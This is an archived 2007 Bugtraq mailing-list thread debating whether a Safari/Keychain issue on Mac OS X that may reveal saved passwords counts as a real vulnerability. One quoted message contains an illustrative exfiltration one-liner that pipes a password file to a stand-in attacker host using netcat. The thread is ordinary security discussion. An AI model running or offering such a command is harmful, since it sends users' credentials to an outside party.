| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 18 May 2007 13:13:53 -0400 From: "Kevin Finisterre (lists)" <kf_lists@...italmunition.com> To: poplix <poplix@...uasia.org> Cc: bugtraq@...urityfocus.com Subject: Re: Apple Safari on MacOSX may reveal user's saved passwords Make this javascript for Safari show me the saved key for another application (Like a stored WEP key) and I'll be impressed. -KF On May 18, 2007, at 9:23 AM, poplix wrote: > On 17 May 2007, at 7:50 PM, graham.coles@...-logic-group.com wrote: > >> It is also why I don't leave my machine logged in and accessible >> to other >> users, which appears to be the whole basis of this 'vulnerability'. > > this is NOT the basis of the vulnerability. The point is that > normally a malicious applications running as a nonroot are not > able to read keychained passwords. > In this case to steal passwords is sufficent to entice the victim > to execute a malicious script, that normally it's not enough since > keychain refuses access to untrusted applications. > This issue exposes keychained password as those are saved in a text > file: an inexperienced user can loose his password by executing an > untrusted malicious shell script (ie "cat /home/pop/pass | nc > steal.com 666") > > > >> >> The whole concept of the keychain, however, is to restrict access >> to its >> contents to the owner. If you can happily log in as the owner, >> then you >> have everything they can access, INCLUDING the keychain. If they >> can't do >> this, you just have some encrypted data. You don't HAVE to store web >> passwords, of course. > > keychain asks for password when the owner wants to see his data and > having access to a computer doesn't mean that you have the login > password too > > >> If you are sitting at the machine of a person who has left it >> logged in >> and they use this feature, then whatever web browser you are using >> will >> believe you are that person and provide access to the website >> automatically--you don't need to see the password to use it. > > and what if you gain a 5 minutes access to a laptop in the middle > of the desert where internet connection is missing . . . > > >> >> I'd like to know what Apple were supposed to do to fix this? > > i think it's sufficent to untrust the injected code.... > > >> >> It is, after all, YOUR keychain with YOUR passwords that YOU want >> applications to recover when YOU are logged in. Why shouldn't YOU >> be able >> to access it. If you don't want to use it don't, but if someone >> has to be >> logged in as you to read it, that sounds about right. > > right?? it's like having passwords saved in a text file and 'chmod > 700' it > > >> >>>> Someone has *ROOT* access to your system REMOTELY over ssh and >>>> you're >>>> worried that they might be able to retrieve a password from your >> keychain. > > rooting a computer is really not the point, it' quite obvious that > "rooted comp" => "TOTAL compromise" > > > > Let me make a question: what if safari makes loaded password part > of the html so it's shown when clicking "view page source" ..?? > should it be considered a vulnerability?? > > > cheers, > -poplix > > > > > > > >> >>> Yes, it would be annoying if someone rooted my laptop. It would >>> be a >>> lot more annoying if they not only rooted my laptop but also >>> cleaned out >>> my bank account via my browser. >> >> 'Annoying' is the understatement of the millennium. >> >> As far as root access goes, see my comments above regarding key >> loggers? >> >> With root access they will have your gpg file, they will know what >> processes are running (they will know when you run gpg) and they can >> capture your keystrokes. Is this then a vulnerability of gpg? So >> much for >> keeping your online banking safe. Even if you memorize the >> passwords, they >> can still see your keypresses and thereofre empty your bank account. >> >> If someone roots your machine, security is non-existant and trust >> beyond >> repair. Don't trivialize this by comparing it to a 'might be able >> to see >> your web passwords' issue, this is disaster incarnate and game >> over all >> rolled into one! > >> >>> It *is* somewhat disturbing that root can so trivially interfere >>> with >>> the guts of someone else's processes. Normally, root has to do a >>> lot of >>> work to do that. >> >> With great power comes great responsibility, which is precisely >> why Macs >> have the root login disabled and require a user designated as >> 'Administrator' to authenticate themself whenever system files are >> modified or installed. Other users are created as non- >> administrator and >> remote login is blocked by the firewall. The chances of anyone >> actually >> logging in remotely as root on a normal Mac are zero as you, while >> administrator, would have to specifically enable all of this. This >> is why >> Apple warn you not to do it. >> >>>>> a different non-root user on the console can do it too >>>> Which again restricts this vunerability (as previously >>>> mentioned) to >> an >>>> attacker who happens to be sitting in front of your machine(!) >> >>> Did you read the bit where I speculated about setuid applications? >> >> Yes, but again if you can get this far you either have the person's >> identity or root access (bad or hopeless situation respectively). Why >> worry incessantly about things that you stored in the keychain being >> accessed when someone can access everything you own. >> >> Should the keychain refuse to divulge its contents to a person >> authenticated as the owner? >> >> Is the answer to remove the keychain and watch as people revert to >> storing >> their passwords unencrypted in stickies, or text files on their >> desktop? >> >> You normally have to come up with a feasible attack vector for >> something >> to be a vulnerability, this seems far too early to be notifying the >> vendor. >> >> Saving passwords on any web browser is a lousy idea from a security >> perspective. However, people don't like security, they like >> convenience. >> The only real fix here is perhaps a disclaimer message advising >> people not >> to store important passwords for websites in the browser in the first >> place. But lets face reality, even if the did would it stop people >> doing >> it? >> > > > > > >>> -- >>> David Cantrell >> >> -- >> Graham Coles >> >> >> >> The Logic Group Enterprises Limited >> Logic House, Waterfront Business Park, Fleet Road, Fleet, >> Hampshire, GU51 3SB, UK >> Registered in England. Registered No. 2609323 >
Powered by blists - more mailing lists